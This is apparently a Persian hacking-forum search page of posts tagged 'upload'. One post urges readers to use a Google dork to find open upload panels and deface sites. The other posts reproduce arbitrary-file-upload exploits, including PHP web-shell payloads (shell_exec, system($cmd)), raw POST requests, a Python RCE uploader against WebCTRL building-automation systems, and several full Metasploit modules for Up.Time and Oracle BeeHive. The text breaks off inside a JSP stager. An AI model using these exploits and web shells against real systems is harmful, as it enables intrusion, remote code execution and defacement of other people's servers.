امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند



iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'upload'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

20 نتیجه پیدا شد

  1. Hacking-Penetration testing to the site

    dork : inurl:/examples/uploadbutton.html خب دوستان عزیز این دورک را سرچ کرده و به راحتی دیفیس پیج خود را برروی سایت اپلود کنید (پنل اپلود آزاد است)
  2. Hacking

    # # # # # # Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - Arbitrary File Upload # Dork: N/A # Date: 11.12.2017 # Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio # Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825 # Demo: http://vanguard-demo.esy.es/ # Version: 1.4 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an users upload arbitrary file.... # # Vulnerable Source: # ..................... # $row = $row->fetch(PDO::FETCH_ASSOC); # $folder_name = $row['id'] * 2; # $folder_name_2 = $folder_name * 5; # $check_dir1 = 'uploads/'.$folder_name; # $check_dir2 = $check_dir.'/'.$folder_name_2; # if (!is_dir($check_dir1)) { mkdir($check_dir1); } # if (!is_dir($check_dir2)) { mkdir($check_dir2); } # $thumbnail_path = $check_dir1."/".basename($_FILES['thumbnail_file']['name']); # $preview_path = $check_dir1."/".basename($_FILES['preview_file']['name']); # $main_path = $check_dir2."/".basename($_FILES['main_file']['name']); # $error = 0; # $upload_path = './'; # ..................... # # Proof of Concept: # # Users Add a new product/Add a product preview... # # http://localhost/[PATH]/ # http://localhost/[PATH]/uploads/[FOLDER_NAME]/[FILE].php # # # # # #
  3. # Exploit Title: Unauthenticated Arbitrary File Upload # Date: November 12, 2017 # Exploit Author: Colette Chamberland # Author contact: [email protected] # Author homepage: https://defiant.com # Vendor Homepage: https://accesspressthemes.com/ # Software Link: https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446 # Version: < 3.2.0 # Tested on: Wordpress 4.x # CVE : CVE-2017-16949 Description: Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters. PoC: POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1 Host:server User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792 Content-Length: 264 Referer: http://target.com/ Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6; Connection: close Upgrade-Insecure-Requests: 1 -----------------------------7230359611602921801124357792 Content-Disposition: form-data; name="qqfile"; filename="myshell.php" Content-Type: text/php <?php echo shell_exec($_GET['e'].' 2>&1'); ?> -----------------------------7230359611602921801124357792--
  4. Exploit Title: Monstra CMS - 3.0.4 RCE Vendor Homepage: http://monstra.org/ Software Link: https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip Discovered by: Ishaq Mohammed Contact: https://twitter.com/security_prince Website: https://about.me/security-prince Category: webapps Platform: PHP Advisory Link: https://blogs.securiteam.com/index.php/archives/3559 Description: MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to a remote command execution on the remote server. Vulnerable Code: https://github.com/monstra-cms/monstra/blob/dev/plugins/box/filesmanager/filesmanager.admin.php line 19: public static function main() { // Array of forbidden types $forbidden_types = array('html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'php', 'phtml', 'php3', 'php4', 'php5', 'phps', 'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c', 'htaccess', 'htpasswd', 'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty'); Proof of Concept Steps to Reproduce: 1. Login with a valid credentials of an Editor 2. Select Files option from the Drop-down menu of Content 3. Upload a file with PHP (uppercase)extension containing the below code: <?php $cmd=$_GET['cmd']; system($cmd); ?> 4. Click on Upload 5. Once the file is uploaded Click on the uploaded file and add ?cmd= to the URL followed by a system command such as whoami,time,date etc. Recommended Patch: We were not able to get the vendor to respond in any way, the software appears to have been left abandoned without support – though this is not an official status on their site (last official patch was released on 2012-11-29), the GitHub appears a bit more active (last commit from 2 years ago). The patch that addresses this bug is available here: https://github.com/monstra-cms/monstra/issues/426
  5. #!/usr/bin/env python # -*- coding: utf8 -*- # # # Automated Logic WebCTRL 6.5 Unrestricted File Upload Remote Code Execution # # # Vendor: Automated Logic Corporation # Product web page: http://www.automatedlogic.com # Affected version: ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior # ALC WebCTRL, SiteScan Web 6.1 and prior # ALC WebCTRL, i-Vu 6.0 and prior # ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior # ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior # # Summary: WebCTRL®, Automated Logic's web-based building automation # system, is known for its intuitive user interface and powerful integration # capabilities. It allows building operators to optimize and manage # all of their building systems - including HVAC, lighting, fire, elevators, # and security - all within a single HVAC controls platform. It's everything # they need to keep occupants comfortable, manage energy conservation measures, # identify key operational problems, and validate the results. # # Desc: WebCTRL suffers from an authenticated arbitrary code execution # vulnerability. The issue is caused due to the improper verification # when uploading Add-on (.addons or .war) files using the uploadwarfile # servlet. This can be exploited to execute arbitrary code by uploading # a malicious web archive file that will run automatically and can be # accessed from within the webroot directory. Additionaly, an improper # authorization access control occurs when using the 'anonymous' user. # By specification, the anonymous user should not have permissions or # authorization to upload or install add-ons. In this case, when using # the anonymous user, an attacker is still able to upload a malicious # file via insecure direct object reference and execute arbitrary code. # The anonymous user was removed from version 6.5 of WebCTRL. # # Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601) # Apache-Coyote/1.1 # Apache Tomcat/7.0.42 # CJServer/1.1 # Java/1.7.0_25-b17 # Java HotSpot Server VM 23.25-b01 # Ant 1.7.0 # Axis 1.4 # Trove 2.0.2 # Xalan Java 2.4.1 # Xerces-J 2.6.1 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2017-5431 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5431.php # # ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-17-234-01 # CVE ID: CVE-2017-9650 # CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9650 # # # 30.01.2017 # # import itertools import mimetools import mimetypes import cookielib import binascii import urllib2 import urllib import sys import re import os from urllib2 import URLError global bindata __author__ = 'lqwrm' piton = os.path.basename(sys.argv[0]) def bannerche(): print ''' @[email protected] | | | WebCTRL 6.5 Authenticated RCE PoC | | ID: ZSL-2017-5431 | | Copyleft (c) 2017, Zero Science Lab | | | @[email protected] ''' if len(sys.argv) < 3: print '[+] Usage: '+piton+' <IP> <WAR FILE>' print '[+] Example: '+piton+' 10.0.0.17 webshell.war\n' sys.exit() bannerche() host = sys.argv[1] filename = sys.argv[2] with open(filename, 'rb') as f: content = f.read() hexo = binascii.hexlify(content) bindata = binascii.unhexlify(hexo) cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) print '[+] Probing target http://'+host try: checkhost = opener.open('http://'+host+'/index.jsp?operatorlocale=en') except urllib2.HTTPError, errorzio: if errorzio.code == 404: print '[!] Error 001:' print '[-] Check your target!' print sys.exit() except URLError, errorziocvaj: if errorziocvaj.reason: print '[!] Error 002:' print '[-] Check your target!' print sys.exit() print '[+] Target seems OK.' print '[+] Login please:' print ''' Default username: Administrator, Anonymous Default password: (blank), (blank) ''' username = raw_input('[*] Enter username: ') password = raw_input('[*] Enter password: ') login_data = urllib.urlencode({'pass':password, 'name':username, 'touchscr':'false'}) opener.addheaders = [('User-agent', 'Thrizilla/33.9')] login = opener.open('http://'+host+'/?language=en', login_data) auth = login.read() if re.search(r'productName = \'WebCTRL', auth): print '[+] Authenticated!' token = re.search('wbs=(.+?)&', auth).group(1) print '[+] Got wbs token: '+token cookie1, cookie2 = [str(c) for c in cj] cookie = cookie1[8:51] print '[+] Got cookie: '+cookie else: print '[-] Incorrect username or password.' print sys.exit() print '[+] Sending payload.' class MultiPartForm(object): def __init__(self): self.form_fields = [] self.files = [] self.boundary = mimetools.choose_boundary() return def get_content_type(self): return 'multipart/form-data; boundary=%s' % self.boundary def add_field(self, name, value): self.form_fields.append((name, value)) return def add_file(self, fieldname, filename, fileHandle, mimetype=None): body = fileHandle.read() if mimetype is None: mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' self.files.append((fieldname, filename, mimetype, body)) return def __str__(self): parts = [] part_boundary = '--' + self.boundary parts.extend( [ part_boundary, 'Content-Disposition: form-data; name="%s"' % name, '', value, ] for name, value in self.form_fields ) parts.extend( [ part_boundary, 'Content-Disposition: file; name="%s"; filename="%s"' % \ (field_name, filename), 'Content-Type: %s' % content_type, '', body, ] for field_name, filename, content_type, body in self.files ) flattened = list(itertools.chain(*parts)) flattened.append('--' + self.boundary + '--') flattened.append('') return '\r\n'.join(flattened) if __name__ == '__main__': form = MultiPartForm() form.add_field('wbs', token) form.add_field('file"; filename="'+filename, bindata) request = urllib2.Request('http://'+host+'/_common/servlet/lvl5/uploadwarfile') request.add_header('User-agent', 'SCADA/8.0') body = str(form) request.add_header('Content-type', form.get_content_type()) request.add_header('Cookie', cookie) request.add_header('Content-length', len(body)) request.add_data(body) request.get_data() urllib2.urlopen(request).read() print '[+] Payload uploaded.' print '[+] Shell available at: http://'+host+'/'+filename[:-4] print sys.exit()
  6. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'nokogiri' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'Th3 MMA mma.php Backdoor Arbitrary File Upload', 'Description' => %q{ This module exploits Th3 MMA mma.php Backdoor which allows an arbitrary file upload that leads to arbitrary code execution. This backdoor also echoes the Linux kernel version or operating system version because of the php_uname() function. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jay Turla <@shipcod3>', ], 'References' => [ ['URL', 'http://blog.pages.kr/1307'] # Analysis of mma.php file upload backdoor ], 'Privileged' => false, 'Payload' => { 'Space' => 10000, 'DisableNops' => true }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ ['mma file uploader', {} ] ], 'DisclosureDate' => 'Apr 2 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI',[true, "The path of the mma.php file uploader backdoor", "/mma.php"]), ],self.class) # sometimes it is under host/images/mma.php so you may want to set this one end def has_input_name?(nodes, name) nodes.select { |e| e.attributes['name'].value == name }.empty? ? false : true end def check uri = normalize_uri(target_uri.path) res = send_request_cgi({ 'method' => 'GET', 'uri' => uri }) if res n = ::Nokogiri::HTML(res.body) form = n.at('form[@id="uploader"]') inputs = form.search('input') if has_input_name?(inputs, 'file') && has_input_name?(inputs, '_upl') return Exploit::CheckCode::Appears end end Exploit::CheckCode::Safe end def exploit uri = normalize_uri(target_uri.path) payload_name = "#{rand_text_alpha(5)}.php" print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor") data = Rex::MIME::Message.new data.add_part('Upload', nil, nil, 'form-data; name="_upl"') data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{payload_name}\"") post_data = data.to_s res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) if res if res.body =~ /uplod d0n3 in SAME file/ print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...") register_files_for_cleanup(payload_name) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'Connection Timed Out') end send_request_cgi({ 'uri' => normalize_uri(payload_name), 'method' => 'GET' }) end end
  7. require 'msf/core' require 'nokogiri' class Metasploit4 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload', 'Description' => %q{ This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0. The vulnerability began as a classic arbitrary file upload vulnerability in post2file.php, which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was mitigated by the vendor. Although the mitigiation in place will prevent uptime_file_upload_1.rb from working, it can still be bypassed and gain privilege escalation, and allows the attacker to upload file again, and execute arbitrary commands. }, 'License' => MSF_LICENSE, 'Author' => [ 'Denis Andzakovic', # Found file upload bug in post2file.php in 2013 'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>', 'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>' ], 'References' => [ ['EDB', '37888'], ['URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php'] ], 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [['Automatic', {}]], 'Privileged' => 'true', 'DefaultTarget' => 0, # The post2file.php vuln was reported in 2013 by Denis Andzakovic. And then on Aug 2015, # it was discovered again by Ewerson 'Crash' Guimaraes. 'DisclosureDate' => 'Nov 18 2013' )) register_options( [ Opt::RPORT(9999), OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']), OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample']) ], self.class) register_advanced_options( [ OptString.new('UptimeWindowsDirectory', [true, 'Uptime installation path for Windows', 'C:\\Program Files\\uptime software\\']), OptString.new('UptimeLinuxDirectory', [true, 'Uptime installation path for Linux', '/usr/local/uptime/']), OptString.new('CmdPath', [true, 'Path to cmd.exe', 'c:\\windows\\system32\\cmd.exe']) ], self.class) end def print_status(msg='') super("#{rhost}:#{rport} - #{msg}") end def print_error(msg='') super("#{rhost}:#{rport} - #{msg}") end def print_good(msg='') super("#{rhost}:#{rport} - #{msg}") end # Application Check def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) ) unless res vprint_error("Connection timed out.") return Exploit::CheckCode::Unknown end n = Nokogiri::HTML(res.body) uptime_text = n.at('//ul[@id="uptimeInfo"]//li[contains(text(), "up.time")]') if uptime_text version = uptime_text.text.scan(/up\.time ([\d\.]+)/i).flatten.first vprint_status("Found version: #{version}") if version >= '7.4.0' && version <= '7.5.0' return Exploit::CheckCode::Appears end end Exploit::CheckCode::Safe end def create_exec_service(*args) cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs = *args res_service = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'main.php'), 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'vars_get' => { 'section' => 'ERDCInstance', 'subsection' => 'add', }, 'vars_post' => { 'initialERDCId' => '20', 'target' => '1', 'targetType' => 'systemList', 'systemList' => '1', 'serviceGroupList' => '-10', 'initialMode' => 'standard', 'erdcName' => 'Exploit', 'erdcInitialName' => '', 'erdcDescription' => 'Exploit', 'hostButton' => 'system', 'erdc_id' => '20', 'forceReload' => '0', 'operation' => 'standard', 'erdc_instance_id' => '', 'label_[184]' => 'Script Name', 'value_[184]' => cmd, 'id_[184]' => 'process', 'name_[process]' => '184', 'units_[184]' => '', 'guiBasic_[184]' => '1', 'inputType_[184]' => 'GUIString', 'screenOrder_[184]' => '1', 'parmType_[184]' => '1', 'label_[185]' => 'Arguments', 'value_[185]' => cmdargs, 'id_[185]' => 'args', 'name_[args]' => '185', 'units_[185]' => '', 'guiBasic_[185]' => '1', 'inputType_[185]' => 'GUIString', 'screenOrder_[185]' => '2', 'parmType_[185]' => '1', 'label_[187]' => 'Output', 'can_retain_[187]' => 'false', 'comparisonWarn_[187]' => '-1', 'comparison_[187]' => '-1', 'id_[187]' => 'value_critical_output', 'name_[output]' => '187', 'units_[187]' => '', 'guiBasic_[187]' => '1', 'inputType_[187]' => 'GUIString', 'screenOrder_[187]' => '4', 'parmType_[187]' => '2', 'label_[189]' => 'Response time', 'can_retain_[189]' => 'false', 'comparisonWarn_[189]' => '-1', 'comparison_[189]' => '-1', 'id_[189]' => 'value_critical_timer', 'name_[timer]' => '189', 'units_[189]' => 'ms', 'guiBasic_[189]' => '0', 'inputType_[189]' => 'GUIInteger', 'screenOrder_[189]' => '6', 'parmType_[189]' => '2', 'timing_[erdc_instance_monitored]' => '1', 'timing_[timeout]' => '60', 'timing_[check_interval]' => '10', 'timing_[recheck_interval]' => '1', 'timing_[max_rechecks]' => '3', 'alerting_[notification]' => '1', 'alerting_[alert_interval]' => '120', 'alerting_[alert_on_critical]' => '1', 'alerting_[alert_on_warning]' => '1', 'alerting_[alert_on_recovery]' => '1', 'alerting_[alert_on_unknown]' => '1', 'time_period_id' => '1', 'pageFinish' => 'Finish', 'pageContinue' => 'Continue...', 'isWizard' => '1', 'wizardPage' => '2', 'wizardNumPages' => '2', 'wizardTask' => 'pageFinish', 'visitedPage[1]' => '1', 'visitedPage[2]' => '1' }) end def exploit vprint_status('Trying to login...') # Application Login res_auth = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }) unless res_auth fail_with(Failure::Unknown, 'Connection timed out while trying to login') end # Check OS phpfile_name = rand_text_alpha(10) if res_auth.headers['Server'] =~ /Unix/ vprint_status('Found Linux installation - Setting appropriated PATH') phppath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'apache/bin/ph') uploadpath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'GUI/wizards') cmdargs = "#{uploadpath}#{phpfile_name}.txt" cmd = phppath else vprint_status('Found Windows installation - Setting appropriated PATH') phppath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'apache\\php\\php.exe') uploadpath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'uptime\\GUI\\wizards\\') cmd = datastore['CmdPath'] cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\"" end if res_auth.get_cookies =~ /login=true/ cookie = Regexp.last_match(1) cookie_split = res_auth.get_cookies.split(';') vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") print_good('Login success') # Privilege escalation getting user ID res_priv = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'main.php'), 'vars_get' => { 'page' => 'Users', 'subPage' => 'UserContainer' }, 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}" ) unless res_priv fail_with(Failure::Unknown, 'Connection timed out while getting userID.') end matchdata = res_priv.body.match(/UPTIME\.CurrentUser\.userId\.*/) unless matchdata fail_with(Failure::Unknown, 'Unable to find userID for escalation') end get_id = matchdata[0].gsub(/[^\d]/, '') vprint_status('Escalating privileges...') # Privilege escalation post res_priv_elev = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'main.php'), 'vars_get' => { 'section' => 'UserContainer', 'subsection' => 'edit', 'id' => "#{get_id}" }, 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'vars_post' => { 'operation' => 'submit', 'disableEditOfUsernameRoleGroup' => 'false', 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'passwordConfirm' => datastore['PASSWORD'], 'firstname' => rand_text_alpha(10), 'lastname' => rand_text_alpha(10), 'location' => '', 'emailaddress' => '', 'emailtimeperiodid' => '1', 'phonenumber' => '', 'phonenumbertimeperiodid' => '1', 'windowshost' => '', 'windowsworkgroup' => '', 'windowspopuptimeperiodid' => '1', 'landingpage' => 'MyPortal', 'isonvacation' => '0', 'receivealerts' => '0', 'activexgraphs' => '0', 'newuser' => 'on', 'newuser' => '1', 'userroleid' => '1', 'usergroupid[]' => '1' } ) unless res_priv_elev fail_with(Failure::Unknown, 'Connection timed out while escalating...') end # Refresing perms vprint_status('Refreshing perms...') res_priv = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php?loggedout'), 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}" ) unless res_priv fail_with(Failure::Unknown, 'Connection timed out while refreshing perms') end res_auth = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] } ) unless res_auth fail_with(Failure::Unknown, 'Connection timed out while authenticating...') end if res_auth.get_cookies =~ /login=true/ cookie = Regexp.last_match(1) cookie_split = res_auth.get_cookies.split(';') vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") print_good('Priv. Escalation success') end # CREATING Linux EXEC Service if res_auth.headers['Server'] =~ /Unix/ vprint_status('Creating Linux Monitor Code exec...') create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs) else # CREATING Windows EXEC Service# vprint_status('Creating Windows Monitor Code exec...') create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs) end # Upload file vprint_status('Uploading file...') up_res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'wizards', 'post2file.php'), 'vars_post' => { 'file_name' => "#{phpfile_name}.txt", 'script' => payload.encoded } ) unless up_res fail_with(Failure::Unknown, 'Connection timed out while uploading file.') end vprint_status('Checking Uploaded file...') res_up_check = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'wizards', "#{phpfile_name}.txt") ) if res_up_check && res_up_check.code == 200 print_good("File found: #{phpfile_name}") else print_error('File not found') return end # Get Monitor ID vprint_status('Fetching Monitor ID...') res_mon_id = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'ajax', 'jsonQuery.php'), 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'vars_get' => { 'query' => 'GET_SERVICE_PAGE_ERDC_LIST', 'iDisplayStart' => '0', 'iDisplayLength' => '10', 'sSearch' => 'Exploit' } ) unless res_mon_id fail_with(Failure::Unknown, 'Connection timed out while fetching monitor ID') end matchdata = res_mon_id.body.match(/id=?[^>]*>/) unless matchdata fail_with(Failure::Unknown, 'No monitor ID found in HTML body. Unable to continue.') end mon_get_id = matchdata[0].gsub(/[^\d]/, '') print_good("Monitor id aquired:#{mon_get_id}") # Executing monitor send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'main.php'), 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'vars_post' => { 'section' => 'RunERDCInstance', 'subsection' => 'view', 'id' => mon_get_id, 'name' => 'Exploit' } ) else print_error('Cookie not found') end end end
  8. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload', 'Description' => %q{ This module exploits an arbitrary file upload vulnerability found within the Up.Time monitoring server 7.2 and below. A malicious entity can upload a PHP file into the webroot without authentication, leading to arbitrary code execution. Although the vendor fixed Up.Time to prevent this vulnerability, it was not properly mitigated. To exploit against a newer version of Up.Time (such as 7.4), please use exploits/multi/http/uptime_file_upload_2. }, 'Author' => [ 'Denis Andzakovic <denis.andzakovic[at]security-assessment.com>' # Vulnerability discoverey and MSF module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '100423' ], [ 'BID', '64031'], [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ] ], 'Payload' => { 'Space' => 10000, # just a big enough number to fit any PHP payload 'DisableNops' => true }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Up.Time 7.0/7.2', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 19 2013')) register_options([ OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']), Opt::RPORT(9999) ], self.class) end def check uri = target_uri.path res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'wizards', 'post2file.php') }) if res and res.code == 500 and res.body.to_s =~ /<title><\/title>/ return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit print_status("#{peer} - Uploading PHP to Up.Time server") uri = target_uri.path @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self => true) post_data = ({ "file_name" => @payload_name, "script" => php_payload }) print_status("#{peer} - Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'), 'vars_post' => post_data, }) unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/ fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed") end print_status("#{peer} - Executing payload #{@payload_name}") res = send_request_cgi({ 'uri' => normalize_uri(uri, 'wizards', @payload_name), 'method' => 'GET' }) end end
  9. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload", 'Description' => %q{ This module exploits a vulnerability found in Oracle BeeHive. The prepareAudioToPlay method found in voice-servlet can be abused to write a malicious file onto the target machine, and gain remote arbitrary code execution under the context of SYSTEM. Authentication is not required to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'mr_me <steventhomasseeley[at]gmail.com>', # Source Incite. Vulnerability discovery, PoC 'sinn3r' # MSF module ], 'References' => [ [ 'ZDI', '15-550'], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html' ] ], 'DefaultOptions' => { 'RPORT' => 7777 }, 'Platform' => 'win', 'Targets' => [ ['Oracle Beehive 2', {}] ], 'Privileged' => true, 'DisclosureDate' => "Nov 10 2015", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "Oracle Beehive's base directory", '/']) ], self.class) end def check res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa/')) if res.nil? vprint_error("Connection timed out.") return Exploit::CheckCode::Unknown elsif res && (res.code == 403 || res.code == 200) return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def exploit unless check == Exploit::CheckCode::Detected fail_with(Failure::NotVulnerable, 'Target does not have voice-servlet') end # Init some names # We will upload to: # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\prompt-qa\ exe_name = "#{Rex::Text.rand_text_alpha(5)}.exe" stager_name = "#{Rex::Text.rand_text_alpha(5)}.jsp" print_status("Stager name is: #{stager_name}") print_status("Executable name is: #{exe_name}") register_files_for_cleanup("../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/#{stager_name}") # Ok fire! print_status("Uploading stager...") res = upload_stager(stager_name, exe_name) # Hmm if we fail to upload the stager, no point to continue. unless res fail_with(Failure::Unknown, 'Connection timed out.') end print_status("Uploading payload...") upload_payload(stager_name) end # Our stager is basically a backdoor that allows us to upload an executable with a POST request. def get_jsp_stager(exe_name) jsp = %Q|<%@ page import="java.io.*" %> 